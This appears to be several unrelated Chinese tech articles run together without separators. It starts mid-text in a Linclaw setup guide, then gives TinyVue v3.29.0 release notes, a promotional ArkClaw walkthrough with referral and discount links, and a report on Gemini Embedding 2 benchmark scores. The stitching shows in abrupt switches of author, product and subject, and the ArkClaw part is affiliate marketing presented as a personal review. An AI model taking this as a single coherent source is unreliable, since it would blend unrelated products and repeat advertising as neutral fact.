开源协议MITMIT

Linclaw 支持的 9 大接入渠道

Linclaw 完整支持以下平台,国内用户最关心的四个均已原生支持:

渠道国内/海外状态
钉钉国内✅ 原生支持
飞书国内✅ 原生支持
QQ国内✅ 原生支持
微信国内✅ 原生支持
Telegram海外✅ 支持
Discord海外✅ 支持
Slack海外✅ 支持
iMessage苹果生态✅ 支持
Web浏览器✅ 内置

相比 OpenClaw 官方主推 Telegram/Discord/WhatsApp,Linclaw 的渠道覆盖对国内用户更友好。


安装 Linclaw:3 步完成

第一步:下载安装包

前往 linclaw.qnlinking.com,根据系统选择:

  • macOS(Apple Silicon):下载 ARM DMG
  • macOS(Intel):下载 x86 DMG
  • Windows 10/11 64位:下载 EXE 安装包

也可通过 pip 一步安装(适合已有 Python 环境的用户):

pip install linclaw

或从 GitHub 获取源码自行构建。

第二步:配置 AI 模型

首次启动后,在设置界面填入模型配置。Linclaw 默认接入七牛云 MaaS,内置 DeepSeek V3、Kimi K2.5、智谱 GLM、MiniMax 等国内主流模型,填入七牛云 API Key 即可启用。

也支持接入 Anthropic Claude、OpenAI 等国际模型(填入对应 API Key 和 Base URL)。

第三步:连接渠道

以飞书为例:

  1. 在飞书开放平台创建应用,获取 App ID 和 App Secret
  2. 在 Linclaw 设置中选择"飞书"渠道,填入上述凭证
  3. 将机器人添加到目标群组或开启单聊
  4. 发送消息测试,AI 响应即配置成功

钉钉配置流程类似:创建钉钉机器人 → 获取 Webhook 或 AppKey → 填入 Linclaw → 测试连通。


内置工具:开箱即用的 4 大能力

Linclaw 内置工具无需额外安装插件,AI 可直接调用:

工具功能描述典型用法
Shell执行系统命令"帮我查一下 /tmp 目录下最大的文件"
文件操作读写、搜索本地文件"把这份会议记录整理后保存到桌面"
浏览器网页访问、信息抓取"帮我查一下今天的 AI 新闻摘要"
截图屏幕截图并分析"帮我看一下当前屏幕上的报错是什么意思"

这四个工具覆盖了大多数日常 AI 助手场景,无需像 OpenClaw 那样逐一配置插件。


谁适合用 Linclaw?谁适合用 OpenClaw?

选 Linclaw,如果你是:

  • 企业员工,主要在钉钉/飞书工作,想接入 AI 助手
  • 非技术背景,不想折腾 Node.js 和命令行
  • 想用国产大模型(DeepSeek/Kimi/GLM),希望一站式配置
  • 对安装速度有要求,希望 10 分钟内完成配置

选 OpenClaw,如果你是:

  • 开发者,需要深度自定义工具和插件
  • 已有服务器,需要无头部署(无 GUI)
  • 需要接入 ClawHub 生态的 50+ 专业插件
  • 项目需要多 Agent 复杂路由配置

常见问题

Q:Linclaw 和 OpenClaw 的数据互通吗?
两者均基于 Agent 理念设计,但目前是独立的实现,配置和会话数据不直接互通。如果你同时使用两者,需要分别配置渠道和模型。

Q:Linclaw 是否完全免费?
Linclaw 本体 MIT 开源免费。调用 AI 模型会产生 API 费用——使用七牛云 MaaS 按 Token 计费,新用户有免费额度;使用 OpenAI/Anthropic 等则按各自定价收费。

Q:Linclaw 支持私有部署吗?
支持。MIT 协议允许完全私有化部署,企业可在内网服务器上运行,所有数据不经过第三方。

Q:微信接入是否稳定?
微信官方不开放机器人 API,国内所有 AI 助手工具的微信接入均依赖非官方方式,存在一定封号风险。建议企业场景优先使用钉钉或飞书(均有官方机器人 API),个人使用微信渠道需自行评估风险。

Q:Linclaw 的定时任务怎么配置?
Linclaw 使用 APScheduler 作为调度引擎,支持标准 Cron 表达式配置定时任务(如"每天早上 9 点发送日报摘要")。在设置界面的"定时任务"模块填写 Cron 表达式和任务描述即可,无需命令行操作。


总结

对于国内用户,Linclaw 是目前最省事的 OpenClaw 系 AI 助手方案:零环境依赖、原生支持钉钉/飞书/QQ/微信、内置核心工具、七牛云 MaaS 一键接入国产大模型。OpenClaw 适合需要深度定制的技术用户,Linclaw 适合希望快速落地的个人和企业用户。两者均 MIT 开源,按需选择。

延伸资源:

本文内容基于 2026 年 3 月 Linclaw 官网及 OpenClaw 官方文档,产品功能以各官网最新版本为准。

本文由云软件体验技术团队郑志超原创。

版本速览

v3.29.0 版本带来了:

  • 组件无障碍信息全面完善 - 组件智能化必备
  • 新增tag-input组件- 轻松管理多标签输入,灵活适配任意场景
  • 65+ Bug + 优化修复 - 稳定性大幅提升

详细的 Release Notes 请参考:https://github.com/opentiny/tiny-vue/releases/tag/v3.29.0

新贡献者

本次版本共有 13位贡献者参与开发,其中 Yujing613 / zhaoxiaofeng876 / ourcx 是新朋友,欢迎新朋友的加入👏

  1. @shenjunjian
  2. @kagol
  3. @zzcr
  4. @gimmyhehe
  5. @Yujing613 新增贡献者✨
  6. @Davont
  7. @GaoNeng-wWw
  8. @wuyiping0628
  9. @zhaoxiaofeng876 新增贡献者✨
  10. @James-9696
  11. @IKEYCY
  12. @ourcx 新增贡献者✨
  13. @discreted66

感谢新老朋友们对 TinyVue 的辛苦付出👏

反馈与支持

如果你在使用过程中遇到任何问题,或者有好的建议,欢迎:

升级指南

你可以更新 @opentiny/vue@3.29.0 进行体验!

# 安装最新版本

npm install @opentiny/vue@3.29.0

# 或使用 yarn

yarn add @opentiny/vue@3.29.0

如果遇到问题,可以:

  1. 查看 Issue - 在 GitHub 上搜索相关问题
  2. 提交 Issue - 如果问题未解决,提交新的 Issue

 

特性介绍

下面我们一起来看看都有哪些更新吧!

组件无障碍信息全面提升优化

为什么需要全面优化组件的无障碍信息?

  1. 增强组件语义化,提升代码可维护性和可读性:无障碍信息要求为元素提供清晰的语义角色、状态和名称,这强制开发者在编写代码时明确组件的意图和用途,使得代码结构更清晰、自文档化,便于团队成员理解和维护,降低技术债务。
  2. 优化AI驱动的前端测试与调试效率:通过Chrome DevTools MCP等工具,AI能够像人一样“检查”页面无障碍属性,自动识别缺失的ARIA标签、焦点管理问题,甚至模拟键盘导航,从而在开发早期发现深层次交互缺陷,减少人工回归测试成本。
  3. 提升搜索引擎对页面内容的理解和索引质量:无障碍信息中的标题层级、landmark角色、图片alt文本等语义标记,与SEO优化高度重合,有助于搜索引擎爬虫更准确地解析页面结构和关键内容,从而改善网站在搜索结果中的排名和展示效果。
  4. 支持未来多模态交互和智能助理的无缝集成:随着语音助手、读屏软件、AR/VR等新型交互方式普及,完备的无障碍信息成为应用与这些智能代理对话的基础,使得用户可以通过语音指令直接操作界面,实现更自然的“人-AI-应用”交互链条。
  5. 扩大组件库的用户基数和应用场景,增强市场竞争力:一个全面优化无障碍的组件库能同时服务于开发者构建合规的政府/企业项目、公益组织应用以及面向国际市场的产品,显著提升组件库的适用性和吸引力,形成差异化竞争优势。

优化后的效果:

    组件无障碍信息在完备的情况下,使用 opentiny 主推的 AI-Extension 浏览器插件可以轻松操控TinyVue搭建的业务页面,具体效果如下演示视频:

1.gif

新增tag-input组件: 轻松管理多标签输入,灵活适配任意场景

先来大体看下组件的基本外观感受一下:

2.png

主要特性:
  1. 禁用与只读 - 支持禁用状态和只读模式
  2. 最大标签数 - 可以限制最多可输入的标签数量
  3. 折叠标签 - 当标签过多时可以折叠显示
  4. 可清空标签 - 支持清空所有已输入的标签
  5. 分隔符输入标签 - 支持通过分隔符(如逗号、空格等)快速输入多个标签
  6. 自定义前后缀 - 可以自定义标签的前缀和后缀内容
  7. 可拖拽标签 - 支持通过拖拽重新排列标签顺序

结语

TinyVue v3.29.0 版本的发布,完成了两项重要升级: 全面增强优化组件库的无障碍信息、新增tag-input组件;同时修复了 65+ 个 Bug,整体稳定性大幅提升。通过这些改进,TinyVue 不仅在性能上实现了突破,也为开发者提供了更灵活、可维护的组件库,期待在未来的项目中为你带来更高效、更优雅的开发体验,让我们一起,让前端开发变得更简单、更高效!

联系我们

GitHub:https://github.com/opentiny/tiny-vue(欢迎 Star ⭐)
官网:https://opentiny.design/tiny-vue
关于我们:https://opentiny.design/opentiny-design/about

小助手微信:opentiny-official
公众号:OpenTiny

大家好,我是R哥。

2026 年,OpenClaw 引爆全网,到现在还没有看到要停歇的迹象,反而越来越火了,个人在玩一人公司,连大厂们都在卷,整个 AI 生态都在玩 OpenClaw,真的是热闹非凡啊。

全网都在积极地部署 OpenClaw 来养虾,甚至还有不少玩家已经养成了好几只虾了,你确定还要做一个旁观者吗??

如果你想上手 OpenClaw,还是有一定门槛的。。

说说几大痛点和共鸣:

  • 环境配置复杂,即使是技术人员,动辄几小时甚至一天的部署时间,折腾到怀疑人生。
  • Token 消耗如流水,一不小心就超预算,成本飙升,压力山大。
  • 模型响应不稳定,关键时刻掉链子。

难道就没有一个全家桶方案,能让我们真正实现零门槛安装和使用 OpenClaw,免去复杂配置、7 × 24 在线,同时实现 Token 自由吗

别急,火山引擎这次把门槛直接拆了,小白也能部署和玩转小龙虾了。。

最近,火山引擎推出了 Arkclaw,解决了上述所有痛点,可一键部署 OpenClaw、对接飞书机器人、玩转飞书生态等,好用、方便又便宜。

Arkclaw 介绍及优势

ArkClaw 是火山引擎提供的云端 AI 智能体(Agent)服务,能实现一键云端部署 OpenClaw,享有一对一专属 ECS 资源,免去复杂配置、7 × 24 在线,零门槛使用 OpenClaw,还能无缝使用订阅的火山方舟 Coding Plan,告别 Token 按量计费焦虑。

如果你以为 Arkclaw 只是一个 OpenClaw 部署工具,那你就错了。

说说使用 Arkclaw 的优势:

  • 更优的模型适配:支持 Doubao-Seed 2.0 Pro & Lite & Code / DeepSeek 3.2 / GLM 5.0 / MiniMax 2.5 / Kimi 2.5,高效协同 Doubao-Seed 2.0;
  • 更低的使用成本:自带 Token 节省和优化,支持端云存储协同,文件无缝直连,减少重复传输与计算,构建长期记忆;
  • 更亲和飞书生态:专属飞书插件(火山 ArkClaw 独家优势),轻松处理日程安排和提醒、会议总结预定、复杂文档/表格处理,一键接入飞书专属 Skills;并内置网盘长效存储,LUl & Terminal 兼容模式,灵活易用;
  • 更安全使用环境:全面保护数据与隐私安全,支持火山专属 Skills Hub,内置 Skills 安全扫描、数据防泄漏能力,确保 Skills 质量与能力,安全可信;
  • 生态兼容:兼容 GLM、Minimax、Kimi 等更多主流模型;
  • 多功能开箱即用:定时任务、人格设置、IM一键配置,0 门槛 Web 端直接使用,功能持续迭代,常用常新。

我还发现了一个更亮眼的功能,它具备傻瓜式运维能力,提供了 Terminal 登录、OpenClaw 自动修复、Skills Hub 白屏化接入等高级功能,让运维变得前所未有的简单,不再需要专业运维技能,人人都能轻松管理和维护 OpenClaw 实例

火山的 ArkClaw 是真的把门槛打下来,小白也能养虾了,下面咱们进入 ArkClaw 接入指南及初体验!

ArkClaw 一键部署 OpenClaw

ArkClaw 的部署过程非常简单,几步操作就能完成,接下来,让我带大家一起上火山养虾,轻松部署 OpenClaw!

ArkClaw 体验入口:

https://v2ig.cn/cRm03IcFyUU/

1、订阅方舟 Coding Plan

方舟 Coding Plan 是为开发者量身打造的 AI Coding 场景订阅服务,现已全面升级,支持主流 Code 模型(Doubao-Seed-2.0-Code & Lite & Pro、Doubao-Seed-Code、GLM、Kimi、DeepSeek 等最新版本)的使用和自由切换。

Coding Plan 服务还兼容主流 AI 编码工具,如:Trae、 Claude Code、veCLI、Cursor、Cline、Codex CLI 等,为开发者提供畅快、智能、稳定的编码体验,提升代码编写效率与质量。

Coding Plan 现在可以抢先体验 ArkClaw:

Lite & Pro Plan 订阅用户都可以免费使用 ArkClaw:

  • Coding Plan Lite 订阅用户,免费体验 7 天 ArkClaw 使用权益;
  • Coding Plan Pro 订阅用户,会话周期内 ArkClaw 可持续免费使用;

太爽了,新用户首购最低 9.9 元就能试玩,量大管饱性价比高,扫码订阅即可。

通过我的邀请注册订阅 Coding Plan,再享 9 折优惠价,首月 8.9 元 就能玩起来了,订阅越多越划算。

可以通过我的邀请链接注册:

https://volcengine.com/L/zBWUFWykf2w/

有了 Coding Plan 的加持,大幅度降低玩 OpenClaw 的成本,再也不用每天计算 tokens 使用量,减少预算管控成本,专注核心开发工作,Coding Plan 简直就是 OpenClaw 这样智能 Agent 的最佳搭档。

2、创建并使用 ArkClaw

订阅任意 Coding Plan 套餐后,就可以创建 ArkClaw 实例了:

点击 “立即创建” 按钮,等个 1 - 2 分钟,就能看到 ArkClaw 实例创建成功了:

3、与 ArkClaw 进行对话

我们可以直接在 ArkClaw 的对话页面与它进行对话了:

我这里问了它是什么模型,以及它是什么操作系统,它都能正确回答,说明它已经成功部署好了。

4、设置 ArkClaw

点击右上角的设置图标:

在这里,可以重启 ArkClaw、自动修复 ArkClaw 实例、打开终端、配置模型等,其中自动修复功能非常强大,如果 ArkClaw 实例出现异常,直接点击自动修复就能帮你修复实例了,不需要任何专业的运维技能了,真正实现了傻瓜式运维

如果你是开发者,还可以打开终端,直接在云端操作 ArkClaw 实例了,不需要再通过 SSH 连接服务器了,超级方便。

通过飞书与 ArkClaw 对话

上面我们已经成功部署了 ArkClaw,并且在 ArkClaw 的对话页面和它进行了对话,接下来,我来演示一下如何通过飞书来和 ArkClaw 进行对话

现在通过扫描二维码就能一键创建机器人,太方便了。

回到 ArkClaw 对话页面,点击 “飞书配对” 按钮:

等待终端命令执行完成,会展示创建飞书机器人二维码:

然后使用手机飞书 APP 扫描该二维码,并填写机器人名称,再点击 “创建” 按钮开始创建流程:

机器人创建成功后,ArkClaw 会自动配置新建机器人信息:

期间不要关闭终端,等显示 “所有任务执行成功!” 说明配对成功了,最后关掉终端窗口就好了。

完成机器人匹配后,我们就可以通过飞书机器人与 ArkClaw 进行对话了:

这里,我和 ArkClaw 问了个好,然后让它把 OpenClaw 更新到了最新版本。

之后,我们就可以通过飞书来和 ArkClaw 进行对话了,不用每次都要回到 ArkClaw 的对话页面了,手机、电脑都能随时指挥 ArkClaw,超级方便!

ArkClaw + 飞书高级玩法

使用 ArkClaw 和飞书结合的好处就是,可以让 ArkClaw 直接在飞书里帮我们处理一些事情,让 ArkClaw 直接在飞书里帮我们安排日程、创建定时任务、生成飞书文档等,大大提升了我们的工作效率。

接下来,我来演示这几个 ArkClaw 和飞书结合的高级玩法,看看 ArkClaw 在飞书机器人里面怎么玩。

1、安排日程

先演示一个让 ArkClaw 创建飞书日程的场景,比如:

帮我定一个明天早上 9 点的日程,主题是:写一篇 ArkClaw 的原创文章。

如果没有授权过,会要求授权,点击授权后会弹出飞书授权页面,完成授权后就可以看到日程已经创建成功了:

在日历中也可以看到这个日程:

这个场景对使用 ArkClaw 的小伙伴们非常实用,可以让 ArkClaw 帮我们安排日程,提醒我们按时完成任务。

所以,学会了这点,我们再也不用担心忘记重要的事情了,也不用手动去创建日程了,一句话 ArkClaw 就帮你搞定了

2、创建定时任务

这里我再演示一个让 ArkClaw 创建定时任务的场景,比如:

每天早上 9 点,抓取一下过去 24 小时内的 AI 领域的热点新闻并生成报告。

定时任务创建成功后,ArkClaw 就会每天早上 9 点自动执行这个任务了,我们就可以每天早上都收到一份 AI 领域的热点新闻报告了

也可以让它手动执行一下这个定时任务,看看它的效果:

不错,效果杠杠的,它帮我抓取了 24 小时内的 AI 热点新闻,并且生成了一个简单的报告。

这个功能对于需要定期执行某些任务的小伙伴们来说非常实用,可以让 ArkClaw 帮我们自动执行这些任务了。

比如,如果你是程序员,你还可以让它帮你每天定时检查一下你的代码仓库,看看有没有新的 issue 或者 pull request 需要处理了,让 ArkClaw 帮我们自动执行这些重复性的任务。

3、生成飞书文档

使用 ArkClaw 最强大的功能之一就是它自带的飞书生态了,下面我演示下如何让 ArkClaw 将任务的结果保存为飞书文档,方便通过飞书查看、分享,比如:

帮我调研下 ClawHub 中下载量最多的前 10 个 Skill,将它们的功能、特点、安装方式等信息汇总为一个飞书文档。

在授权成功后,它就会自动创建一个飞书文档,并将调研结果保存到这个文档里了。

来查看这个文档:

很惊艳啊,这个功能真的太强大了。。。

学会这一招,我们就可以让 ArkClaw 直接在飞书里帮我们生成文档,有需要还可以分享出去,对于需要经常生成报告、总结的同学来说,这个功能简直就是神器了

总结

总的来说,火山引擎的 ArkClaw 真的是一个非常强的 OpenClaw 部署和使用工具,它不仅解决了 OpenClaw 部署的痛点,还提供了很多实用的功能,让我们能够更方便地使用 OpenClaw 来养虾。

谁不想要一个 7 * 24 小时的全能助手,来帮我们处理各种任务呢?

有了 ArkClaw,这一切都变得简单了,它能帮你安排日程、创建定时任务、生成飞书文档,甚至帮你写代码、调试代码,等等,使用场景非常多,一人就是一个小团队了。

更重要的是,你不需要再担心部署和运维了,让 ArkClaw 专注于帮你做更多有价值的事情吧

最后再奉上 ArkClaw 的体验入口链接:

https://v2ig.cn/cRm03IcFyUU/

一起来玩 ArkClaw 养虾吧,提升工作效率!

谷歌发布首个原生多模态嵌入模型

 

昨夜,谷歌宣布推出全新的多模态嵌入模型 Gemini Embedding 2,这是首个基于 Gemini 架构构建的原生多模态嵌入模型。目前,该模型已经通过 Gemini API 和 Vertex AI 向开发者提供公开预览。

 

与此前仅支持文本向量化的嵌入模型不同,Gemini Embedding 2 可以将文本、图像、视频、音频以及文档等多种数据类型映射到同一个统一的嵌入空间,从而支持跨媒体语义理解与检索。这一能力意味着开发者可以在同一向量数据库中处理不同类型的数据,并基于语义相似度实现跨模态搜索、分类与聚类。

 

从应用层面来看,统一嵌入空间可以显著简化多模态 AI 系统的架构。以往,如果企业希望构建支持文本与图像检索的系统,通常需要分别使用不同模型生成向量,再通过额外的对齐或映射机制进行整合。而 Gemini Embedding 2 将不同模态的语义直接投射到同一向量空间,使得 检索增强生成(RAG)、语义搜索、情感分析、推荐系统以及数据聚类 等任务能够在统一框架下完成。

 

在能力规格上,Gemini Embedding 2 延续了 Gemini 系列模型的多模态处理优势,并对不同输入类型提供了明确的支持范围。

 

  • 文本:支持最多 8192 个输入标记的扩展上下文

  • 图像处理:每次请求最多可处理 6 张图像,支持 PNG 和 JPEG 格式

  • 视频:支持输入最长 120 秒的 MP4 和 MOV 格式视频

  • 音频:原生支持音频数据的导入和嵌入,无需中间文本转录。

  • 文档:直接嵌入最多 6 页的 PDF 文件

 

除了单模态处理能力之外,Gemini Embedding 2 还原生支持交错输入(interleaved input)。开发者可以在同一个请求中同时传入多种模态,例如“图片 + 文本描述”或“视频 + 文本提示”。模型会在生成向量表示时综合不同媒体之间的关系,从而捕捉更复杂的语义结构。例如,在电商或媒体分析场景中,系统可以同时理解商品图片与描述文本之间的关联。

 

在向量表示层面,Gemini Embedding 2 采用了Matryoshka Representation Learning(MRL)技术。这种表示学习方法通过“嵌套”信息结构,使模型能够在保持语义质量的前提下动态压缩向量维度。

 

默认情况下,模型输出 3072 维向量,但开发者可以根据需求缩减维度,以降低存储与检索成本。官方建议在 3072、1536 或 768 维三个级别之间进行选择,以在性能与资源消耗之间取得平衡。

 

那么,这款新模型性能如何?

多项基测排名第一

 

谷歌在官网介绍,Gemini Embedding 2 不仅仅是对传统模型的改进,它还为多模态深度建模树立了新的性能标杆,引入了强大的语音处理能力,并在文本、图像和视频任务中超越了领先的模型。这种可衡量的性能提升和独特的多模态覆盖范围,能够精准满足开发者多样化的嵌入需求。

 

具体而言,在 Text–Text(文本对文本)的语义匹配任务中,Gemini Embedding 2 的表现优于其他模型。在 MTEB 多语言基准(Mean Task)测试中

 

  • Gemini Embedding 2:69.9

  • Gemini-embedding-001:68.4

  • Amazon Nova 2:63.8

  • Voyage 3.5:58.5

 

这一指标反映模型在多语言语义理解任务中的平均能力。Gemini Embedding 2 比 Amazon Nova 2高出约 6 分,比 Voyage 3.5高出超过 11 分,说明其在跨语言语义对齐方面具有更好的泛化能力。

 

代码语义理解(MTEB Code)上,同样具有优势:

  • Gemini Embedding 2:84.0

  • Gemini-embedding-001:76.0

 

相比上一代 Google 文本嵌入模型,提升达到8 个点,表明新模型在技术文档、代码搜索、开发者 RAG 等场景中的表现显著增强。

在 Text–Image 与 Image–Text 任务上,Gemini Embedding 2 在主流数据集上几乎全面领先。在文本到图像检索中,在 TextCaps 数据集上,

 

  • Gemini Embedding 2:89.6

  • Amazon Nova 2:76.0

  • Voyage 3.5:79.4

  • multimodalembedding@001:74.0

 

Gemini Embedding 2 相比 Amazon Nova 2 提升约 13.6 分,说明其文本到图像语义映射更准确。

 

在图像到文本检索中,在 TextCaps 数据集上,

 

  • Gemini Embedding 2:97.4

  • Google multimodalembedding@001:88.1

  • Amazon Nova 2:88.9

  • Voyage 3.5:88.6

 

Gemini Embedding 2 接近 100 分水平,比其他模型 高出约 9 分。

 

谷歌强调,嵌入技术是许多谷歌产品体验的核心驱动力。从 RAG(嵌入技术在上下文工程中发挥关键作用)到大规模数据管理和经典搜索/分析,谷歌的一些早期合作伙伴已经在使用 Gemini Embedding 2 来解锁高价值的多模态应用。

 

Everlaw 公司 CTO Max Christoff 表示:“在诉讼取证(Discovery)这一高风险、高技术要求的环节中,寻找核心信息是一项巨大的挑战。我们之所以选择 Gemini 嵌入(embeddings)技术,正是因为其在这一领域的卓越表现。最新的测试结果显示,Gemini 的多模态嵌入模型在处理数百万条记录时,显著提升了搜索的准确率(Precision)与召回率(Recall),并成功解锁了针对图像和视频文件的强大搜索功能。对于法律专业人士而言,这些新能力为快速理解和掌握复杂大案的卷宗材料提供了全新的、前所未有的路径。”

 

 

Sparkonomy 联合创始人 Guneet Singh 表示:“Gemini Embedding 2 为 Sparkonomy 的‘创作者经济平等引擎’奠定了坚实基础。得益于其原生的多模态能力,我们通过省去大模型(LLM)推理环节,将延迟大幅降低了70%;同时,文本-图像及文本-视频对的语义相似度得分从 0.4 提升至 0.8,实现了近乎翻倍的飞跃。这为我们独有的‘创作者基因组(Creator Genome)’提供了强大动力,使其能够以前所未有的精度,对数百万分钟的视频以及海量图像和文本进行索引。这不仅解锁了更加公正客观的品牌合作,也让经济成功的红利普惠至每一位创作者。”

网友评价:多模态 RAG 新基准来了

 

在多模态大模型竞争进入白热化的今天,谷歌新一代嵌入模型的发布不仅打破了技术圈的宁静,更在开发者社区引发了一场关于“效率革命”的大讨论。

 

网友们的评价从工程架构的简化到行业范式的转移,无一不透露出对这一技术跃迁的震撼。

 

对于许多企业而言,维护一个庞大的数据管道是必不可少的成本。然而,新模型的出现正在彻底重写这一逻辑。

 

“一个能够同时嵌入文本、图像、视频、音频和文档的统一空间,其背后的意义极其深远。”

 

有网友犀利地指出,以往需要雇佣8 个人精心维护的整条“数据管道团队”,如今在这一新模型面前,竟然被压缩成了一个简单的API 调用。这种极致的“智能密度”让开发者感慨:一个曾经需要跨部门协作才能实现的复杂系统,现在仅凭一个终端指令即可完成。这不仅是技术的进步,更是企业工程效率的一次“降维打击”。

长期以来,AI 在处理不同模态的数据时,往往像是处于互不相通的“孤岛”中。而新模型对交错输入(Interleaved Input)的支持,被网友公认为最神奇的突破点。谷歌的新模型主要具备以下几点突破,首先是全场景融合: 用户可以将图像、长篇音频和 PDF 文档等异构数据“一股脑儿地扔进去”。此外还能跨模态共情: 模型不再只是生硬地提取关键词,而是能够真正理解内容的语气、氛围与内在逻辑。

 

网友评论称:“我们终于不用再忍受模态孤岛了。”这种全局理解能力,标志着 AI 从“分类机器”进化到了真正的“语境大师”。

如果说架构的简化和功能的增强是“面子”,那么合作伙伴给出的实测数据则是扎实的“里子”。Everlaw 和 Sparkonomy 等早期接入者的反馈,让业内人士感到震惊。

 

从合作伙伴给出的数据来看,有网友认为这绝非一次常规的小版本迭代,而是为多模态 RAG(检索增强生成)树立了全新的行业基准。

 

参考链接:

https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-embedding-2/

https://x.com/search?q=gemini%20embedding%202&src=typed_query

https://ai.google.dev/gemini-api/docs/models/gemini-embedding-2-preview?hl=zh-cn